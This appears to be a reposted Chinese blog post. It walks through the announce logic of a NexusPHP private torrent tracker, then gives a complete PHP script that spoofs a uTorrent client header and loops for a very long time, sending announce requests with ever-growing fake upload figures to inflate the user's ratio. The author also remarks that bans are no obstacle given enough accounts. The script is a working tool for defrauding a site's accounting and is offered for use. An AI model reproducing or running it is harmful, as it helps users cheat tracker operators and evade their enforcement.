源码网上可以找
第一步 分析源码
//1.分析客户端 默认的允许的客户端请参照各大站
$agent = $_SERVER["HTTP_USER_AGENT"];
block_browser();
//2.分析参数 这几个参数必须有
foreach (array("passkey","info_hash","peer_id","event") as $x)
{
if(isset($_GET["$x"]))
$GLOBALS[$x] = $_GET[$x];
}
foreach (array("port","downloaded","uploaded","left","compact","no_peer_id") as $x)
{
$GLOBALS[$x] = 0 + $_GET[$x];
}
//3.端口 用常识填一个就行了
if (!$port || $port > 0xffff)
err("invalid port");
if (!ip2long($ip)) //Disable compact announce with IPv6
$compact = 0;
//中间发包间隔是30s 速度不超过100Mb/s
burp抓包确认
上传个源码。。。 请大家不要恶搞 谢谢 nexus就算被封号 一样可以有效上传 只要号足够多。。。你懂的
set_time_limit(0);
for ($i=1; $i < 100000000; $i++) {
shuafen3($i);
ob_flush();
flush();
sleep(40);
}
function shuafen3($i){
/*
伪造头 其实只要user agent 其他可以忽略
*/
$headers[‘User-Agent‘] = ‘uTorrent/342(109414725)(35141)‘;
$headerArr = array();
foreach( $headers as $n => $v ) {
$headerArr[] = $n .‘:‘ . $v;
}
/*
绝对不要用http_build_query() 会对参数和值encode 但是源码中并没有decode 会导致info_hash错误
所以拼url就可以
*/
$url = SITE_URL;
$url .= ‘passkey=e0d3629ea5ab14bb2c2f74a3ed48c696&‘;
$url .= ‘info_hash=E%00%b3%ca%de3W4%f7j%9b%7b%86G%fdV8%e9p%3c&‘;
$url .= ‘peer_id=-UT3420-E%89y%aaP%bfW%e0%a1%ed%d9W&‘;
$url .= ‘port=60579&‘;
$url .= ‘uploaded=‘.(0+$i*73400320).‘&‘;
$url .= ‘downloaded=0&‘;
$url .= ‘left=43399315456&‘;
$url .= ‘corrupt=0&‘;
$url .= ‘key=01E9E5A9&‘;
$url .= ‘event=started&‘;
$url .= ‘numwant=200&‘;
$url .= ‘compact=1&‘;
$url .= ‘no_peer_id=1‘;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headerArr);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
//必须使用http 1.0 协议 1.1的协议会对数据压缩 traker不认
$response = curl_exec($ch);
if(curl_errno($ch)){
print curl_errno($ch).‘ - ‘.curl_error($ch);
echo curl_getinfo($ch, CURLINFO_HTTP_CODE);
}
curl_close($ch);
echo iconv("UTF-8", "GBK//IGNORE",$response).‘
‘;
}
?>
个人兴趣 和站长提了几个漏洞 被站长喷SB
原文:http://www.cnblogs.com/christian-ye/p/4078423.html
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
